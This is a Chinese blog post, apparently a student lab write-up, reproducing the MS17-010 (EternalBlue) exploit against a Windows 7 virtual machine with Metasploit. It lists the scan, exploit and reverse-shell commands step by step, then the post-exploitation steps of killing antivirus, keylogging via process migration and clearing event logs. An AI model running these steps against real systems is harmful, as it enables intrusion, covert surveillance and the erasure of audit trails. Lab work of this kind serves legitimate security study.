MS17-010漏洞:

MS17-010漏洞:

• 一、 MS17-010漏洞公告及相关分析报告

•二、漏洞重现

•漏洞利用防范


• 一、 MS17-010漏洞公告及相关分析报告

★MS17_010 漏洞攻击:曾经危害全球的勒索病毒利用的永恒之蓝漏洞。

公告

Microsoft 安全公告 MS17-010 - 严重

Microsoft Windows SMB 服务器安全更新 (4013389)

发布日期:2017 年 3 月 14 日

漏洞信息

●多个 Windows SMB 远程执行代码漏洞

●当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。

●为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。

应对措施:

此安全更新通过更正 SMBv1 处理这些经特殊设计的请求的方式来修复漏洞。

可以看出,该漏洞的主要成因就是攻击者可向目标 SMBv1 服务器发送经特殊设计的数据包。以此来获取在目标系统上执行代码的能力。

•二、漏洞重现

1)环境搭建

1.下载安装kali虚拟系统。

Kali:一个基于 Debian 的 Linux 发行版。它的目标就是为了简单:在一个实用的工具包里尽可能多的包含渗透和审计工具。Kali 实现了这个目标。大多数做安全测试的开源工具都被囊括在内。

Kali 是由 Offensive Security 公司开发和维护的。它在安全领域是一家知名的、值得信赖的公司,它甚至还有一些受人尊敬的认证,来对安全从业人员做资格认证。

Kali 也是一个简便的安全解决方案。Kali 并不要求你自己去维护一个 Linux 系统,或者你自己去收集软件和依赖项。它是一个“交钥匙工程”。所有这些繁杂的工作都不需要你去考虑,因此,你只需要专注于要审计的真实工作上,而不需要去考虑准备测试系统。

安装完成后设置好相应的分辨率。

Kali系统

2.安装windows7

为了在受控的环境下模拟攻击过程,安装windows7虚拟机作为被攻击主机。

Win7系统

3.模拟使用 MS17_010 漏洞攻击

kali控制台输入:msfconsole

进入metasploit框架

●寻找MS17_010漏洞: search ms17_010

找寻漏洞

这里找到了五个模块,前两个辅助模块是探测主机是否存在MS17_010漏洞,后三个是漏洞利用模块,先探测哪些主机存在漏洞

2)侦察

●输入命令:use auxiliary/scanner/smb/smb_ms17_010

●查看这个模块需要配置的信息:show options

RHOSTS 参数是要探测主机的ip或ip范围,

比如若要探测一个ip范围内的主机是否存在漏洞

●输入:set  RHOSTS  192.168.125.125-129.168.125.140

当然,由于是虚拟机环境,所以目标就是win7的主机

首先查看kali自己的ip地址:192.168.163.129

●然后关闭win7的防火墙:

关闭防火墙

●查看win7的ip地址:192.168.163.130

●尝试win7 ping kali:

●用kali ping win7:

都成功了。

●现在尝试一下漏洞扫描:

set  RHOSTS  192.168.163.130

exploit

这里有+号的就是可能存在漏洞的主机。【可能是因为我把win7防火墙关了】

3)漏洞利用模块

●然后就可以去利用漏洞攻击了,选择漏洞攻击模块:

use exploit/windows/smb/ms17_010_eternalblue  

●查看这个漏洞的信息:info

●查看可攻击的系统平台,这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统:show targets

●查看攻击载荷:show  payloads

●设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp

●查看模块需要配置的参数: show  options

●设置RHOST,也就是要攻击主机的ip:set   RHOST  192.168.163.130

●设置LHOST,也就是自己的ip,用于接收从目标机弹回来的shell:

set  LHOST 192.168.163.129

攻击!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

冲啊!!!!!!!!!!!!!!!!!!!!!!!!!!!!

攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit

攻击成功

4)后渗透阶段

●运行了exploit命令之后,开启了一个reverse TCP监听器来监听本地的 4444 端口,即我(攻击者)的本地主机地址(LHOST)和端口号(LPORT)。运行成功之后,将会看到命令提示符 meterpreter > 出现,

●输入: shell  即可切换到目标主机的windows shell

成功!!!!!!

●可以尝试验证一下猜想:ipconfig

发现此时查询到的ip是win7的ip:192.168.163.130

完美!!!

美中不足的是中文貌似无法显示。

要想从目标主机shell退出到 meterpreter ,只需输入:exit

●要想从 meterpreter 退出到MSF框架,输入:background

●输入: sessions  -l       查看获得的shell,前面有id

●输入: session  -i  1     即可切换到id为1的shell

●输入:sysinfo   查看目标主机的信息

可以看到这是刚才的win7

关闭杀毒软件 :

●拿到目标主机的shell后第一件事就是关闭掉目标主机的杀毒软件,通过命令:run  killav

●现在这个可怜的win7 已经成为了我待宰的羔羊

●在win7中新建记事本,打开,模拟用户操作:

Kali中ps  命令查看目标设备中运行的进程:

●发现了notepad!!!!

Ok,继续:

可以使用:  getpid  查看当前的进程id

●使用: migrate  命令来绑定目标进程id,这里绑定目标pid的时候

●绑定完成之后,就可以开始捕获键盘数据了

可以看到,他跟踪了我的键盘记录:

我是陈卓,来自CUG 192162班

我的学号是20161001412

●完成攻击操作之后,要记得“打扫战场”。

●所有操作都会被记录在目标系统的日志文件之中,因此需要在完成攻击之后使用命令  clearev  命令来清除事件日志:

●渗透测试结束~~~~~~~~

●退出!

•漏洞利用防范

1.定期更新官网的补丁,防止0日攻击

2.不要浏览不安全,来源不明的网站。

3.防火墙始终保持开启。事实上防火墙可以帮助隔挡掉许多攻击行为。

4.不要轻易暴露自己的IP地址,如浏览暗网等行为,需要使用洋葱网络隐藏IP

5.时常扫描电脑查看是否有未知漏洞。

永恒之蓝MS17-010漏洞利用 writeup相关推荐

  1. 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用

            好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷 ...

  2. 网络安全攻击手段之永恒之蓝【MS17_010】利用及漏洞剖析

    声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!!! 永恒之蓝利用方法 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子 ...

  3. 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)

    文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...

  4. 永恒之蓝漏洞复现测试

    永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...

  5. metasploit复现永恒之蓝漏洞

    Table of Contents 0x01 设备 0x02 条件 0x03 漏洞复现 0x04 漏洞利用 00x0 后话 0x01 设备 内置metasploit的kali Linux: win7. ...

  6. Metasploit(MSF)实战_永恒之蓝漏洞拿下win7靶机

    声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循<中华人民共和国网络安全法>,共同维护清朗的网络空间 一.Metasploit(MSF)简介 Metasploit与2003年由H. ...

  7. 勒索病毒WannaCry(永恒之蓝)

    原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 .作者信息和本声明.否则将追究法律责任.http://solin.blog.51cto.com/11319413/1925890 勒索病 ...

  8. Metasploit渗透框架介绍及永恒之蓝复现

    Metasploit渗透框架介绍及永恒之蓝复现 一.Metasploit渗透框架介绍 1.1 名词解释 1.2 MSF简介 1.3 MSF框架结构 1.4 MSF命令汇总 1.4.1 常用命令 1.4 ...

  9. 09永恒之蓝与永恒之黑的复现

    一.永恒之蓝 1.简介 2017年3月14日,微软公布SMB远程代码执行漏洞(MS17-010),又称永恒之蓝,该漏洞在 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时 ...

最新文章

  1. jq中查找上级_【节能学院】电能管理系统在福州三岐小学项目中的设计及应用...
  2. android qq弹出菜单,Android开发实现qqminihd 左右滑动菜单效果
  3. 自学前端1年,靠着这份面试题和答案,我找到了20K工作
  4. [转载] Python日历模块| 使用示例的weekday()方法
  5. python开发k8s管理平台_运维开发和k8s运维如何选择,请各位大神指导一下?
  6. 考满分软件测试工程师(实习)面试软达启航面试
  7. Oracle数据反向恢复
  8. 避坑!!!Matlab中文版下载地址、详细讲解Matlab中文版的下载、安装
  9. iOS传感器开发——加速度传感器,螺旋仪传感器,磁力传感器的应用
  10. git log查看提交的Author是由谁决定的呢?
  11. java clh_【Java并发编程实战】—– AQS(四):CLH同步队列
  12. 2022CCPC预选赛J Roulette
  13. mysql的索引缺点_Sqlite数据库中索引的使用、索引的优缺点
  14. 多租户SaaS管理系统框架设计:多租户,多组织,用户区别
  15. 英语论文写作技巧-2
  16. 香油和一个生鸡蛋,干咳偏方
  17. 腾讯社招 —— 腾讯游戏后端工程师(一面)
  18. 魔力鸭linux驱动下载,魔力鸭原厂2108s固件
  19. React全家桶+AntD 实战二
  20. Linux---进程调度及CFS调度器

热门文章

  1. Flask(十二)——消息闪现
  2. OSChina 周六乱弹 —— 到底谁是小公猫……
  3. Linux学习 -- Shell面试题练习
  4. python安装要装oracle,python安装oracle数据库
  5. 指标详解(2)-- 指数平滑移动平均线(MACD)详解
  6. android8 .te文件,te文件
  7. 关于单精度和双精度实数
  8. 垃圾分类解决方案-最新全套文件
  9. 子曰:“吾十有五而志于学.......
  10. 湖北省计算机二级报名时间2020年12,2020年3月湖北省计算机等级考试报名_时间:12月10日-12月23日...